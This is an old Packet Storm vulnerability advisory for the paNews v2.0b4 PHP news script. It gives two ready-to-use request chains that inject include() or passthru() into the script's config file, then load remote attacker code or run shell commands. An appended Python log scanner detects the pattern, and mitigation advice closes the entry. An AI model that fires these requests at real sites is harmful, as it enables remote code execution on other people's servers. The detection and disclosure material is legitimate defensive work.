paNews_v2.0b4.txt

2005-02-26T00:00:00
ID PACKETSTORM:36256
Type packetstorm
Reporter nst.e-nex.com
Modified 2005-02-26T00:00:00

Description

                    
`********************************
**** Network security team ***** 
********* nst.e-nex.com ******** 
******************************** 
* Title: paNews v2.0b4 
* Bug found by: тёмыч
* Date: 20.02.2005 
******************************** 
 
web: http://www.phparena.net/panews.php 
google: allintitle:paNews v2.0b4 
 
PHP Injection 
The bug only works if:
1. register_globals=On
2. the includes folder is writable

p.s. turn off javascripts =-]
 
Example 1 
 
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst) 
 
then: 
 
http://victim/panews/includes/config.php?nst=http://your/file.php 
 
 
Example 2 
 
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst) 
 
then: 
 
http://victim/panews/includes/config.php?nst=id`
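
A log check for the two-request pattern in the examples above, added here as an example and not part of the original advisory: it flags direct requests to includes/admin_setup.php that supply the access array from the client, and requests to includes/config.php that carry a query string. The log lines are constructed, and the finding names and the functions classify and scan are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a common/combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# PHP variables, function calls or open tags inside a settings value.
PHP_SYNTAX_RE = re.compile(r'\$\w+|\w+\s*\(|<\?')

def classify(line):
    """Return a finding name for one access-log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = url.path.lower()
    # parse_qsl percent-decodes, so access%5B%5D and access[] look the same.
    params = parse_qsl(url.query, keep_blank_values=True)
    if path.endswith("/includes/admin_setup.php"):
        # The include is requested directly and the client supplies "access".
        if any(k == "access" or k.startswith("access[") for k, _ in params):
            if any(PHP_SYNTAX_RE.search(v) for _, v in params):
                return "settings-update-with-php-syntax"
            return "client-supplied-access-array"
    elif path.endswith("/includes/config.php") and params:
        # Assumption: nothing legitimate requests config.php with a query string.
        return "config-php-with-query-string"
    return None

def scan(lines):
    """Return (line_number, finding) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        finding = classify(line)
        if finding:
            hits.append((n, finding))
    return hits

# Constructed sample lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Feb/2005:10:00:00 +0000] "GET /panews/index.php?page=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Feb/2005:10:01:10 +0000] "GET /panews/includes/admin_setup.php'
    '?access%5B%5D=admins&do=updatesets&showcopy=include($nst) HTTP/1.1" 200 312',
    '203.0.113.9 - - [26/Feb/2005:10:01:30 +0000] "GET /panews/includes/config.php?nst=id HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```

A hit on either rule is a reason to inspect includes/config.php for injected code. The advisory's own preconditions point at the mitigation: register_globals=Off and an includes directory the web server cannot write to.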